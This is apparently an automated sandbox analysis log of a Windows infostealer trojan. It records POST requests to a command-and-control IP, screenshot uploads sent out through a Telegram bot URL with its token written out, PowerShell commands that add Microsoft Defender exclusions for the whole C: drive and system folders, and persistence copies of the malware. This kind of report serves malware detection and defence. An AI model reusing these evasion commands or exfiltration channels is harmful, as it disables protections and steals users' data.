Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2140Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2544Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2128Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.66.51 (50 identical entries in the report)
Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1 Host: ipinfo.io Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /country HTTP/1.1 Host: ipinfo.io
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2225670983.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ymail.google.com;example.com;any.domain.net;youtube.com;www.youtube.com;store.steampowered.com;steampowered.com;steam.com; equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: ipinfo.io
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: unknown HTTP traffic detected: POST /bot7829111840:AAGwC163Z3bte6z_YuN643yX5LplCCYUaLM/sendPhoto HTTP/1.1 Content-Type: multipart/form-data; boundary="34997188-a42f-41eb-990d-cfd33339eec7" Host: api.telegram.org Content-Length: 86200 Expect: 100-continue Connection: Keep-Alive
Source: powershell.exe, 00000040.00000002.2903448372.00000164CC7BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.mic
Source: powershell.exe, 00000040.00000002.2903448372.00000164CC7BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micft.cMicRosof
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2260842550.000000001D838000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.v
Source: svchost.exe, 0000004F.00000003.2444686605.000001C427480000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000046.00000002.2899814464.0000023F80227000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2286246823.0000018037D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2274378069.000001E800227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2288795317.000001C5B1437000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2317980485.000001F984329000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2302011903.00000239E3AE8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2288980593.0000016E22068000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2322173796.00000232E13F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2301992566.000001FDA2458000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2274595482.0000024700228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2289717560.000001F8D4D18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2303019914.00000251BCF67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2303795968.00000293B2A48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2225670983.0000000002AD5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2286246823.0000018037B51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2274378069.000001E800001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2288795317.000001C5B1211000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2317980485.000001F984118000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2302011903.00000239E38C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2288980593.0000016E21E41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2322173796.00000232E11D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2301992566.000001FDA2231000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2274595482.0000024700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2289717560.000001F8D4AF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2303019914.00000251BCD41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2303795968.00000293B2821000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.3219775689.000001F6120B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.2886040639.0000018180001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.3511417406.0000016822BD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003C.00000002.3259951458.0000019354D41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.3268697288.000002A1BE461000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000040.00000002.3495706955.00000164CE721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000042.00000002.3507396549.000001B712461000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.2882983145.000001F700001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.2286246823.0000018037D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2274378069.000001E800227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2288795317.000001C5B1437000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2317980485.000001F984329000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2302011903.00000239E3AE8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2288980593.0000016E22068000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2322173796.00000232E13F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2301992566.000001FDA2458000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2274595482.0000024700228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2289717560.000001F8D4D18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2303019914.00000251BCF67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2303795968.00000293B2A48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000046.00000002.2899814464.0000023F80227000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2286246823.0000018037B51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2274378069.000001E800001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2288795317.000001C5B1211000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2317980485.000001F984118000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2302011903.00000239E38C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2288980593.0000016E21E41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2322173796.00000232E11D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2301992566.000001FDA2231000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2274595482.0000024700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2289717560.000001F8D4AF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2303019914.00000251BCD41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2303795968.00000293B2821000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.3219775689.000001F6120B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.2886040639.0000018180001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.3511417406.0000016822BD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003C.00000002.3259951458.0000019354D41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.3268697288.000002A1BE461000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000040.00000002.3495706955.00000164CE721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000042.00000002.3507396549.000001B712461000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.2882983145.000001F700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.2899814464.0000023F8001F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2225670983.0000000002BA0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2225670983.0000000002BA0000.00000004.00000800.00020000.00000000.sdmp, d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2257536514.000000001B322000.00000002.00000001.01000000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2225670983.0000000002BA0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot7829111840:AAGwC163Z3bte6z_YuN643yX5LplCCYUaLM/sendPhoto
Source: svchost.exe, 0000004F.00000003.2444686605.000001C4274F3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 0000004F.00000003.2444686605.000001C427480000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: powershell.exe, 00000046.00000002.2899814464.0000023F80227000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2225670983.0000000002AD5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2225670983.0000000002AD5000.00000004.00000800.00020000.00000000.sdmp, d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2257536514.000000001B322000.00000002.00000001.01000000.00000000.sdmp String found in binary or memory: https://ipinfo.io/country
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2225670983.0000000002AD5000.00000004.00000800.00020000.00000000.sdmp, d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2257536514.000000001B322000.00000002.00000001.01000000.00000000.sdmp String found in binary or memory: https://ipinfo.io/ip
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Window created: window name: CLIPBRDWNDCLASS
Source: powershell.exe Process created: 44
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Code function: 0_2_00007FF848DF0D67 0_2_00007FF848DF0D67
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Code function: 0_2_00007FF848FA074D 0_2_00007FF848FA074D
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Code function: 0_2_00007FF848FA5FF5 0_2_00007FF848FA5FF5
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Code function: 53_2_00007FF848E20D67 53_2_00007FF848E20D67
Source: Joe Sandbox View Dropped File: C:\Users\user\Desktop\ArFrORkS.log 75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000000.2059603887.0000000000452000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2257666854.000000001B332000.00000002.00000001.01000000.00000000.sdmp Binary or memory string: OriginalFilenameq944h9VdeekiaLj6nIEA0nxdMfYwMGO54 vs d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2257536514.000000001B322000.00000002.00000001.01000000.00000000.sdmp Binary or memory string: OriginalFilenameBzUOsUELloh7lcyuhpXTcoPR5FGxF70O4 vs d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Binary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, B3txKmJG66b3TvIggSB.cs Cryptographic APIs: 'CreateDecryptor'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, B3txKmJG66b3TvIggSB.cs Cryptographic APIs: 'CreateDecryptor'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, B3txKmJG66b3TvIggSB.cs Cryptographic APIs: 'CreateDecryptor'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, B3txKmJG66b3TvIggSB.cs Cryptographic APIs: 'CreateDecryptor'
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@89/164@2/4
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Program Files (x86)\mozilla maintenance service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\Desktop\fTGLCVSM.log
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8884:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\db37e7674e0c9c73d718eed222877e169116f5b2c083f00aedc6dc96849528f8
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\AppData\Local\Temp\ZQ41MPITjV
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zuwFoSPM2u.bat"
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 0L4O4hE8bk.36.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe ReversingLabs: Detection: 87%
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File read: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
Source: unknown Process created: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe "C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe"
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
